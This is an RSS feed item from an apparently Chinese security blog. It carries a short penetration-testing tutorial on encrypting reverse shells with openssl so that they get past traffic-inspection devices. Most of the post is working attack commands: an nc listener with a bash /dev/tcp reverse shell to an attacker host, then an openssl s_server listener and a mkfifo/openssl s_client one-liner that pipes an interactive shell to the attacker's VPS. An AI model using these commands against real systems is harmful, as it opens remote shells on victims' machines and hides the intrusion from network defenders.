<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>openssl &#8211; ChaBug安全</title>
	<atom:link href="/tags/openssl/feed" rel="self" type="application/rss+xml" />
	<link>/</link>
	<description>一个分享知识、结识伙伴、资源共享的博客</description>
	<lastBuildDate>Mon, 26 Aug 2019 05:43:31 +0000</lastBuildDate>
	<language>zh-CN</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=5.5.5</generator>
	<item>
		<title>利用openssl加密你的shell</title>
		<link>/web/936.html</link>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Mon, 26 Aug 2019 05:43:31 +0000</pubDate>
				<category><![CDATA[渗透测试]]></category>
		<category><![CDATA[openssl]]></category>
		<category><![CDATA[reverse]]></category>
		<category><![CDATA[shell]]></category>
		<guid isPermaLink="false">/?p=936</guid>

					<description><![CDATA[利用openssl加密你的shell 在我们实际的渗透测试过程中，总是有各种各样的流量审查设备挡住我们通往system的道路，尤其是在反弹shell的时候，明文传输的shell总是...]]></description>
										<content:encoded><![CDATA[<p>利用<span class="wpcom_tag_link"><a href="/tags/openssl" title="openssl" target="_blank">openssl</a></span>加密你的<span class="wpcom_tag_link"><a href="/tags/shell" title="shell" target="_blank">shell</a></span></p>
<p>在我们实际的渗透测试过程中，总是有各种各样的流量审查设备挡住我们通往system的道路，尤其是在反弹shell的时候，明文传输的shell总是容易断，那么本文介绍一种利用openssl反弹流量加密的shell来绕过流量审查设备。</p>
<h1>常规bash反弹</h1>
<p>vps执行 <code>nc -lvvp 4444</code></p>
<p>目标主机执行 <code>bash -i &gt;&amp; /dev/tcp/172.16.1.1/4444 0&gt;&amp;1</code></p>
<p><img src="https://y4er.com/img/uploads/20190826131727.png" alt="20190826131727" /></p>
<p>流量明文传输，很容易被拦截。</p>
<h1>openssl加密传输</h1>
<p>第一步，在vps上生成SSL证书的公钥/私钥对</p>
<pre><code class="language-bash ">openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
</code></pre>
<p>第二步，在VPS监听反弹shell</p>
<pre><code class="language-bash ">openssl s_server -quiet -key key.pem -cert cert.pem -port 4433
</code></pre>
<p>第三步，在目标上用openssl加密反弹shell的流量</p>
<pre><code class="language-bash ">mkfifo /tmp/s;/bin/bash -i &lt; /tmp/s 2&gt;&amp;1|openssl s_client -quiet -connect vps:443 &gt; /tmp/s;rm /tmp/s
</code></pre>
<p><img src="/wp-content/uploads/2019/08/20190826132310.png" alt="20190826132310" /></p>
<p>流量已经被加密。</p>
<h1>参考链接</h1>
<ol>
<li>https://www.t00ls.net/articles-52477.html</li>
<li>https://www.freebuf.com/vuls/211847.html</li>
<li>https://www.cnblogs.com/heycomputer/articles/10697865.html</li>
</ol>
<p><strong>文笔垃圾，措辞轻浮，内容浅显，操作生疏。不足之处欢迎大师傅们指点和纠正，感激不尽。</strong></p>
]]></content:encoded>
					
		
		
			</item>
	</channel>
</rss>
